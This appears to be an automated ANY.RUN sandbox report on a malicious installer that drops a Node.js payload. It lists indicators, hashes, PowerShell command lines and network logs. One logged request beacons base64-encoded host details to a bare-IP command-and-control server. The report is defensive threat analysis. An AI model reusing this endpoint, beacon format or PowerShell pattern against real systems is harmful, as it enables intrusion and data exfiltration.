File name:

Insprock289.exe

Full analysis: https://app.any.run/tasks/c7f65e13-cbab-4630-88e9-5b41ea1742a5
Verdict: Malicious activity
Analysis date: March 14, 2025, 12:50:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
nodejs
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

438F0C0D9F12A6D97C0DCE2190832BC0

SHA1:

316794630D95E55385EB806E8544DF718E1EABDA

SHA256:

378FB3F303469B11713DDB68409900EEF42386C0B88FF6BBCB588023174507CC

SSDEEP:

786432:xTOQeCGt28GR7DbkHQarIHtTdQUmdGc/BIhOd:xqQeF28GRPbkHQ9WhdGwBIhG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Insprock289.exe (PID: 5204)

    • Changes powershell execution policy (Unrestricted)

      • Three.exe (PID: 736)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Insprock289.exe (PID: 5204)

    • The process creates files with name similar to system file names

      • Insprock289.exe (PID: 5204)

    • Executable content was dropped or overwritten

      • Insprock289.exe (PID: 5204)

    • Drops 7-zip archiver for unpacking

      • Insprock289.exe (PID: 5204)

    • Reads security settings of Internet Explorer

      • Insprock289.exe (PID: 5204)

    • Starts CMD.EXE for commands execution

      • Three.exe (PID: 736)

    • Starts application with an unusual extension

      • cmd.exe (PID: 4424)

    • Application launched itself

      • Three.exe (PID: 736)

    • The process bypasses the loading of PowerShell profile settings

      • Three.exe (PID: 736)

    • Starts POWERSHELL.EXE for commands execution

      • Three.exe (PID: 736)

    • The process hides Powershell's copyright startup banner

      • Three.exe (PID: 736)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7496)

    • Connects to the server without a host name

      • Three.exe (PID: 736)

    • There is functionality for taking screenshot (YARA)

      • Three.exe (PID: 2340)
      • Insprock289.exe (PID: 5204)

    • Process drops legitimate windows executable

      • Insprock289.exe (PID: 5204)

  • INFO

    • The sample compiled with english language support

      • Insprock289.exe (PID: 5204)

    • Checks supported languages

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • chcp.com (PID: 7052)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)

    • Reads the computer name

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
      • Three.exe (PID: 736)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 2384)
      • BackgroundTransferHost.exe (PID: 6640)
      • BackgroundTransferHost.exe (PID: 736)
      • BackgroundTransferHost.exe (PID: 6800)
      • BackgroundTransferHost.exe (PID: 6112)

    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 6640)
      • Three.exe (PID: 736)
      • slui.exe (PID: 6080)

    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 6640)

    • Create files in a temporary directory

      • Insprock289.exe (PID: 5204)

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 6640)

    • Process checks computer location settings

      • Three.exe (PID: 736)

    • Changes the display of characters in the console

      • cmd.exe (PID: 4424)

    • Node.js compiler has been detected

      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)

    • Reads the machine GUID from the registry

      • Three.exe (PID: 736)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7784)
      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 2268)
      • powershell.exe (PID: 8092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:12:15 22:26:14+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 473088
UninitializedDataSize: 16384
EntryPoint: 0x338f
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.7.4.0
ProductVersionNumber: 0.7.4.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Rack
FileDescription: Leave labor wave
FileVersion: 0.7.4
LegalCopyright: Copyright © 2025 Rack
ProductName: Three
ProductVersion: 0.7.4
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
185
Monitored processes
60
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start insprock289.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs three.exe cmd.exe no specs conhost.exe no specs chcp.com no specs three.exe no specs three.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
672\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
736"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
736C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
Insprock289.exe
User:
admin
Company:
Rack
Integrity Level:
MEDIUM
Description:
Leave labor wave
Exit code:
134
Version:
0.7.4
Modules
Images
c:\users\admin\appdata\local\temp\2tzicnrzuzfcgickizc2yplrndk\three.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
1012C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"C:\Windows\SysWOW64\cmd.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1280C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1568C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2140C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2240C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2268C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThree.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
106 349
Read events
106 334
Write events
15
Delete events
0

Modification events

(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2384) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6640) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(736) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6112) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
Executable files
17
Suspicious files
128
Text files
68
Unknown types
0

Dropped files

PID
Process
Filename
Type
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\app-32.7z
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\icudtl.dat
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSES.chromium.html
MD5:
SHA256:
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\System.dllexecutable
MD5:0D7AD4F45DC6F5AA87F606D0331C6901
SHA256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_100_percent.pakbinary
MD5:001AA2A7D5DCAF2D0987804A37E21DB9
SHA256:0B84B7680630DD51CB36A2FCDD7CC3B031636FE6B91F81772822BE9E514132FE
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_200_percent.pakbinary
MD5:749E5FF4A826E7FFE8421634520B7E61
SHA256:8E2AFD2AD5BD4F4EDFE739AD503FF6896410D097665D40E99C56C440A8EBC36E
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\cs.pakbinary
MD5:350BE83206B77C0CB2020F514016E173
SHA256:383CF4EE39F0CB05334ED1FC85F75DD51EC0B0D8FB6E7BD0789AF9CE46ACDCE0
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSE.electron.txttext
MD5:4D42118D35941E0F664DDDBD83F633C5
SHA256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\el.pakbinary
MD5:B4EA6881005579391034881E6ED415CE
SHA256:1ACEE2644BC48D4AA618DB2BDBA6DA2E384CAD19589E65057FE0E7D9D6549446
5204Insprock289.exeC:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\es.pakbinary
MD5:91D5FD37CD425E5C6804509D442E1096
SHA256:03D69E086401040F32E5C258B8D6D9E1BC7CDA53CBACA732D27BAB40A75576A0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
31
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.183:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4740
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6640
BackgroundTransferHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
736
Three.exe
GET
200
217.197.107.91:80
http://217.197.107.91/login.php?event=init&id=dGVzdA==&data=&data=NCBHQl9bb2JqZWN0IE9iamVjdF1fTWljcm9zb2Z0IEJhc2ljIERpc3BsYXkgQWRhcHRlcl9mYWxzZV91bmRlZmluZWR4NzIwX1dpbmRvd3MgMTAgRW50ZXJwcmlzZV8xOSBtaW51dGVzICgwLjMyIGhvdXJzKV9DOlxVc2Vyc1xhZG1pbl9ERVNLVE9QLUpHTExKTERfYWRtaW5fV2luZG93c19OVF9pYTMyXzEwLjAuMTkwNDVfQzpcVXNlcnNcYWRtaW5cQXBwRGF0YVxSb2FtaW5nX0M6XFVzZXJzXGFkbWluXEFwcERhdGFcTG9jYWxcVGVtcF9ERVNLVE9QLUpHTExKTERfX0FNRDY0IEZhbWlseSA2IE1vZGVsIDE0IFN0ZXBwaW5nIDMsIEF1dGhlbnRpY0FNRF94ODZfQzpfNF9DOlxVc2Vyc1xhZG1pblxBcHBEYXRhXExvY2FsXFRlbXBcMnR6aWNuUlp1WmZDR0lja0laQzJZUGxuZEtcVGhyZWUuZXhl
unknown
unknown
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6228
SIHClient.exe
GET
200
23.222.82.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2104
svchost.exe
GET
200
23.48.23.183:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6228
SIHClient.exe
GET
200
23.222.82.102:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.183:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
23.48.23.183:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6544
svchost.exe
20.190.160.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
20.190.160.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4740
backgroundTaskHost.exe
20.31.169.57:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.183
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.150
  • 23.48.23.139
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.176
whitelisted
login.live.com
  • 20.190.160.67
  • 20.190.160.17
  • 40.126.32.133
  • 40.126.32.134
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.65
  • 20.190.160.22
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
www.bing.com
  • 2.19.122.55
  • 2.19.122.59
  • 2.19.122.65
  • 2.19.122.54
  • 2.19.122.63
  • 2.19.122.57
  • 2.19.122.64
  • 2.19.122.60
  • 2.19.122.58
whitelisted
www.google.com
  • 142.250.186.164
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Insprock289.exe